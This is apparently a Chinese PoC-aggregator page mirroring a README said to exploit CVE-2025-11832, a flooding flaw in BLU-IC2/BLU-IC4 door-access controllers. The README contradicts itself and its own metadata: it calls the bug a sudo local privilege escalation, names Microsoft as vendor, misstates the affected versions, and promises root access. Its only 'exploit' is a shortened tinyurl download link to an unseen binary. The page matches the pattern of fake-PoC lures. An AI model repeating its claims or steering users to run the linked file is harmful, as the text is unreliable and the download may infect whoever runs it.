POC详情: 10620d7dc8cd9127e91412c214dd1ddb15aa6f89

来源
关联漏洞
标题: Azure Access Technology BLU-IC2和Azure Access Technology BLU-IC4 安全漏洞 (CVE-2025-11832)
描述:Azure Access Technology BLU-IC2和Azure Access Technology BLU-IC4都是美国Azure Access Technology公司的一种网络门禁控制器。 Azure Access Technology BLU-IC2和Azure Access Technology BLU-IC4 1.19.5及之前版本存在安全漏洞,该漏洞源于资源分配无限制或节流,可能导致泛洪攻击。
介绍
# CVE-2025-11832: Local Privilege Escalation Exploit for Sudo

## Overview

A vulnerability exists in Microsoft Azure Access Technology products BLU-IC2 and BLU-IC4, allowing for resource flooding due to improper resource allocation and lack of throttling mechanisms.


## Vulnerability Details

This could enable malicious entities to exploit the system's resources, potentially leading to service disruptions. Users of versions prior to 1.19.5 should assess their systems and apply available updates to mitigate this risk.

### Key Points

- **Severity**: Critical
- **CVSS Score**: 10 (High)
- **Attack Vector**: Network

Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.


### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/mtma58dx)
文件快照

[4.0K] /data/pocs/10620d7dc8cd9127e91412c214dd1ddb15aa6f89 └── [1.2K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。